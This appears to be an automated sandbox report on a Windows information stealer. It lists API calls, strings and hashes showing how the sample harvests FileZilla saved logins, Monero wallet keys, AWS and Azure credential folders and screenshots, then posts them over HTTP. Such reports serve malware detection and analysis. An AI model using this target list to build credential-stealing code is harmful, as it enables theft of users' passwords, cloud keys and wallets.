                            • Opcode ID: 70604ab87dbc94d10163b2888f4bc5cbae4b240808da61091e5f457023cdd6c4
                            • Instruction ID: 0a1253e6ced8a3550573900b32d8c377e1d0e70e9d369fd8b56f4c671ed62bb1
                            • Opcode Fuzzy Hash: 70604ab87dbc94d10163b2888f4bc5cbae4b240808da61091e5f457023cdd6c4
                            • Instruction Fuzzy Hash: 235158F3F082041BF348AA6AED9577AB6D6EBC4310F1A853DD785C7784F87958068286
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f18f5a70146344600a7bca39148ba1bcd1c6d9816e3d7fe48a5f7b51eb2110a
                            • Instruction ID: 29bdc5917c3e33dc039c0eeb12bb2aea0610e8b7ab7175fba6edc8e1ae682cf1
                            • Opcode Fuzzy Hash: 7f18f5a70146344600a7bca39148ba1bcd1c6d9816e3d7fe48a5f7b51eb2110a
                            • Instruction Fuzzy Hash: E85139F3D182284BE3046A7CDC84767BAD4DB54360F16463DDE88E3380E93A5D0442C5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba48ca243265ce0118075fe6838f50b70ff1a6b605bb9dbbc4b9cac534daa8d3
                            • Instruction ID: 0c0ca3365f008acf086a3a9a69fa028db989c3b4ec1a4533b3dc95fcf98ef0d2
                            • Opcode Fuzzy Hash: ba48ca243265ce0118075fe6838f50b70ff1a6b605bb9dbbc4b9cac534daa8d3
                            • Instruction Fuzzy Hash: B241D2B250C708DFE310BF1ADC856BAFBE8EF98710F15492DE6C582700EB7559458A17
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                              • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,006A0DBA,006A0DB7,006A0DB6,006A0DB3), ref: 00690362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00690369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00690385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 006903CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 006903DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00690419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00690463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00690562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00690571
                            • lstrcat.KERNEL32(?,url: ), ref: 00690580
                            • lstrcat.KERNEL32(?,00000000), ref: 00690593
                            • lstrcat.KERNEL32(?,006A1678), ref: 006905A2
                            • lstrcat.KERNEL32(?,00000000), ref: 006905B5
                            • lstrcat.KERNEL32(?,006A167C), ref: 006905C4
                            • lstrcat.KERNEL32(?,login: ), ref: 006905D3
                            • lstrcat.KERNEL32(?,00000000), ref: 006905E6
                            • lstrcat.KERNEL32(?,006A1688), ref: 006905F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00690604
                            • lstrcat.KERNEL32(?,00000000), ref: 00690617
                            • lstrcat.KERNEL32(?,006A1698), ref: 00690626
                            • lstrcat.KERNEL32(?,006A169C), ref: 00690635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: ab6d067bef2f332426d1a5168c3e98cd2fe85a50b628bacd9f2ed9c396386f46
                            • Instruction ID: 7b5a0d65b8e3a3298a640fa74b07b15a2a7c4df3f438fe0326eeb77fd5e65f2b
                            • Opcode Fuzzy Hash: ab6d067bef2f332426d1a5168c3e98cd2fe85a50b628bacd9f2ed9c396386f46
                            • Instruction Fuzzy Hash: D7D11A72910108ABDF48FBE4DD96EEE73BEFF15300F444518F502A6491DE34AA06CBA6
                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006859F8
                            • StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00685A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00685B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013AE360,00000000,?,013A9D38,00000000,?,006A1A1C), ref: 00685E71
                            • lstrlen.KERNEL32(00000000), ref: 00685E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00685E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00685E9A
                            • lstrlen.KERNEL32(00000000), ref: 00685EAF
                            • lstrlen.KERNEL32(00000000), ref: 00685ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00685EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00685F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00685F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00685F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00685FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00685FBD
                            • HttpOpenRequestA.WININET(00000000,013AE3A0,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00685BF8
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • InternetCloseHandle.WININET(00000000), ref: 00685FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 980511ae3e52c6965957af8ada7fceac19e16f648f53338d5d5d5147a6f7892d
                            • Instruction ID: 6f7a9944320dd372c2a16bade4873928bffb9052d9775d4ed3d65f641738b680
                            • Opcode Fuzzy Hash: 980511ae3e52c6965957af8ada7fceac19e16f648f53338d5d5d5147a6f7892d
                            • Instruction Fuzzy Hash: 3F12DE71820128AADF55EBE0DD95FEEB3BEBF14700F50419DB10A62491DF702A49CFA9
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0068D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0068D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D208
                            • lstrcat.KERNEL32(?,006A1478), ref: 0068D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D22A
                            • lstrcat.KERNEL32(?,006A147C), ref: 0068D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D24C
                            • lstrcat.KERNEL32(?,006A1480), ref: 0068D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D26E
                            • lstrcat.KERNEL32(?,006A1484), ref: 0068D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D290
                            • lstrcat.KERNEL32(?,006A1488), ref: 0068D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D2B2
                            • lstrcat.KERNEL32(?,006A148C), ref: 0068D2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D2D4
                            • lstrcat.KERNEL32(?,006A1490), ref: 0068D2E3
                              • Part of subcall function 0069A820: lstrlen.KERNEL32(00684F05,?,?,00684F05,006A0DDE), ref: 0069A82B
                              • Part of subcall function 0069A820: lstrcpy.KERNEL32(006A0DDE,00000000), ref: 0069A885
                            • lstrlen.KERNEL32(?), ref: 0068D32A
                            • lstrlen.KERNEL32(?), ref: 0068D339
                              • Part of subcall function 0069AA70: StrCmpCA.SHLWAPI(013A8A50,0068A7A7,?,0068A7A7,013A8A50), ref: 0069AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0068D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: a1f9a7b1dbd4e4ba1a07af192f7676b926738e4023632352e988de2bbf4beff8
                            • Instruction ID: abeb258d356049851f5ac450ff7c8f6572f6b76625535eccaf4380018c3b3f23
                            • Opcode Fuzzy Hash: a1f9a7b1dbd4e4ba1a07af192f7676b926738e4023632352e988de2bbf4beff8
                            • Instruction Fuzzy Hash: 7EE12B71910108ABCF48FBE0DD96EEE73BEBF14304F104159F506A6491DE35AE06CBAA
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013AC898,00000000,?,006A144C,00000000,?,?), ref: 0068CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0068CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0068CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0068CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0068CAD9
                            • StrStrA.SHLWAPI(?,013ACA60,006A0B52), ref: 0068CAF7
                            • StrStrA.SHLWAPI(00000000,013AC820), ref: 0068CB1E
                            • StrStrA.SHLWAPI(?,013AD0F8,00000000,?,006A1458,00000000,?,00000000,00000000,?,013A8A70,00000000,?,006A1454,00000000,?), ref: 0068CCA2
                            • StrStrA.SHLWAPI(00000000,013AD178), ref: 0068CCB9
                              • Part of subcall function 0068C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C871
                              • Part of subcall function 0068C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C87C
                            • StrStrA.SHLWAPI(?,013AD178,00000000,?,006A145C,00000000,?,00000000,013A8A20), ref: 0068CD5A
                            • StrStrA.SHLWAPI(00000000,013A88A0), ref: 0068CD71
                              • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B46), ref: 0068C943
                              • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B47), ref: 0068C957
                              • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B4E), ref: 0068C978
                            • lstrlen.KERNEL32(00000000), ref: 0068CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0068CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: 1668e509e5c45c32e8c20a6e70a8fc24b9e0ce67e379f86fe270df06d29ea442
                            • Instruction ID: e2fe4eeaae8f83b3bbc8cd9d9c8b9c0ab3f386eb7684efb792e30476f3019199
                            • Opcode Fuzzy Hash: 1668e509e5c45c32e8c20a6e70a8fc24b9e0ce67e379f86fe270df06d29ea442
                            • Instruction Fuzzy Hash: 9FE1EB71810108ABDF58EBE4DD95EEEB7BEBF14300F40415DF10666591DF306A4ACBA9
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • RegOpenKeyExA.ADVAPI32(00000000,013AAAC0,00000000,00020019,00000000,006A05B6), ref: 006983A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00698426
                            • wsprintfA.USER32 ref: 00698459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0069848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00698499
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 82fbc7d00bd7dc164c9c02791cf7797ef0c3f761ecbacee7249462cca7be2276
                            • Instruction ID: efcb057fe12393bff11fbfda853cf81b0561d7ec0854b53f26817e1981f2d8a9
                            • Opcode Fuzzy Hash: 82fbc7d00bd7dc164c9c02791cf7797ef0c3f761ecbacee7249462cca7be2276
                            • Instruction Fuzzy Hash: 6F81197191011CABEB68DB90CD95FEAB7BDBF08704F008298E109A6580DF716A85CFE5
                            APIs
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00694DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00694DCD
                              • Part of subcall function 00694910: wsprintfA.USER32 ref: 0069492C
                              • Part of subcall function 00694910: FindFirstFileA.KERNEL32(?,?), ref: 00694943
                            • lstrcat.KERNEL32(?,00000000), ref: 00694E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00694E59
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                              • Part of subcall function 00694910: FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                              • Part of subcall function 00694910: FindClose.KERNEL32(000000FF), ref: 00694B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00694EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00694EE5
                              • Part of subcall function 00694910: wsprintfA.USER32 ref: 006949B0
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A08D2), ref: 006949C5
                              • Part of subcall function 00694910: wsprintfA.USER32 ref: 006949E2
                              • Part of subcall function 00694910: PathMatchSpecA.SHLWAPI(?,?), ref: 00694A1E
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,013AE320), ref: 00694A4A
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,006A0FF8), ref: 00694A5C
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,?), ref: 00694A70
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,006A0FFC), ref: 00694A82
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,?), ref: 00694A96
                              • Part of subcall function 00694910: CopyFileA.KERNEL32(?,?,00000001), ref: 00694AAC
                              • Part of subcall function 00694910: DeleteFileA.KERNEL32(?), ref: 00694B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: 5368c47458823a60eecc7707a919baacc5253f41b03c4fe8fb9210e002c7002e
                            • Instruction ID: 304cdcca087fdd609f5e4c42fc4c7245384ff641a56bef6a592560d45766ab39
                            • Opcode Fuzzy Hash: 5368c47458823a60eecc7707a919baacc5253f41b03c4fe8fb9210e002c7002e
                            • Instruction Fuzzy Hash: 0A41D7BA94020867CB54F7B0DC47FDD733DAB25704F004598B645A60C1EEB49BC9CB92
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0069906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 29998bb1082106a528458819ae243223b2866c2c5e3afb183c3698b94150c29a
                            • Instruction ID: b7917b030109f85454c69e62425d2c74da53e66283b06753eeff3831c5abc2df
                            • Opcode Fuzzy Hash: 29998bb1082106a528458819ae243223b2866c2c5e3afb183c3698b94150c29a
                            • Instruction Fuzzy Hash: 0D71CAB5910208ABDB08EBE4DD89FEEB7BDFB48704F108518F515EB690DB34A905CB61
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006931C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0069335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006934EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
